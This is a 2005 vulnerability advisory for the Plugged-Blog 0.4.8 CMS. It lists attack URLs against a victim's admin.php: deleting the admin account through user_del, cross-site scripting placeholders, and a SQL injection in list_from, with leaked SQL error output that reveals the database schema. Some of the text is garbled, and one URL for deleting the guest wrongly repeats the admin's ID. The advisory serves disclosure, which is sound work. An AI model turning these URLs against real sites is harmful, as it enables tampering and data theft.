Plugged-Blog 0.4.8 suffers from multiple cross site scripting, SQL injection, and other flaws. Detailed exploitation provided.
ebbca1ecec9d8e1ddadf735c12f8d774717fd83bf4c04b5d8fc5c63731f562aa
###############################
Plugged-Blog XSS and SQL-Injection flaw & Remove Admin
vendor url: http://www.pluggedout.com
advisory: http://falcondeoro.blogspot.com/2005/07/plugged-blog-xss-and-sql-injection.html
vendor notify: yes exploit available: yes
###############################
Plugged-Blog is a CMS WebBlog-Portal content management systen,
theinstall es very easy to use and configure,it's great to use,
it'sspeed.It's have a Readme and very well It's solution to all
WebMasterand normal users to level down.
#########versions#########
0.4.8
#########Solution#########
No solution at this time !
!#########Timeline########
Discovered: 29-07-2005
vendor notify: 29-07-2005
disclosure: 30-07-2005
####### Bad Definition ########
-Bad definition to variable userid=
-Bad definition to variable contentid=
-Bad definition to variable templateid=
-Bad definition to variable doctupeid=
-Bad definition to variable list_from=
-Bad definition to variable usertypeid=
-Bad definition to variable templateid=
-bad definition to variable contenttypeid=
http://[victim]/admin.php?action=user_del&userid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=content_del&contentid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_edit&templateid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=document_add&doctypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=user_list&list_from=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=usertype_edit&usertypeid=[change-valor-actually-ascendent]
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What do you want remove if it doesen't have nothing? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What do you want remove if it doesn't have nothing? :p
######## How remove Admin ########
For default, the users Admin and Guest exist. And the userid to admin
is 2, and the userid for the guest is 1.If you want to remove Admin,
you write on browser :
http://[victim]/admin.php?action=user_del&userid=2
If you want to remove Guest, you write on browser :
http://[victim]/admin.php?action=user_del&userid=2
Observation: You require login for the user Admin.
##################Proof of comcepts##################
In the messages we want write XSS code and we see in WebBlog Home.If
you writes message XSS Code, in the url :
####### XSS message #######
http://[victim]/admin.php?action=report_statistics&report=visitors
http://[victim]/admin.php?action=content_list
http://[victim]/admin.php?action=report_statistics&report=page_hits
Select the ID to visit (only if he see the message XSS) and we seethe XSS.
#########
XSS
#########
http://[victim]/admin.php?action=content_edit&contentid=[XSS-Code]
http://[victim]/admin.php?action=report_statistics&report=visitors&&s=[XSS-Code]
#########
Observation
#########
http://[victim]/admin.php?action=template_del&templateid=[change-valor-actually-ascendent]
What do you want remove, if it doesen't have nothing? :D
http://[victim]/admin.php?action=contenttype_del&contenttypeid=[change-valor-actually-ascendent]
What do you want remove if it doesn't have nothing? :p
###########
Errors SQl & Sql Injection
###########
If you write XSS code in the url :
http://[victim]/admin.php?action=contenttype_edit&contenttypeid=[XSS-Code]
Or you change the definition to contenttypeid=[change-the-valor]
you can see the message error:
Problem with SQL
[SELECTnContentSecurityId,cms_ContentSecurity.nUserTypeId,
cms_ContentSecurity.nContentTypeId,cUserTypeName,cView,cAdd,cEdit,cDelete,
cApproveFROM cms_ContentSecurity INNER JOIN cms_UserType
ONcms_ContentSecurity.nUserTypeId=cms_UserType.nUserTypeId
WHEREnContentTypeId= ORDER BY cUserTypeName]
And the table to message :
Problem with SQL [SELECT * FROM cms_ContentTypeProperties
WHEREnContentTypeId= ORDER BY nSortIndex]
You can see the Tables and fields.
If you write XSS code in the url to up, you can see the message
error:Could not find record [SELECT * FROM cms_Content WHERE
nContentId=;]
And you have the name to the Table and the field affected.
http://[victim]/admin.php?action=report_statistics&report=visitors&list_from=[SQL-Injection]
And you see these error:SELECT COUNT(nStatisticId) AS
nCount,MAX(dView) ASdLastView,cSessionId,cIPAddress FROM
cms_Statistics GROUP BYcSessionId,cIPAddress ORDER BY dLastView DESC
LIMIT or 1=1,20
######################## nd ##########################
Thxs to Lostmon for support (lostmon@gmail.com) http://lostmon.blogspot.com/
--
Atentamente:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com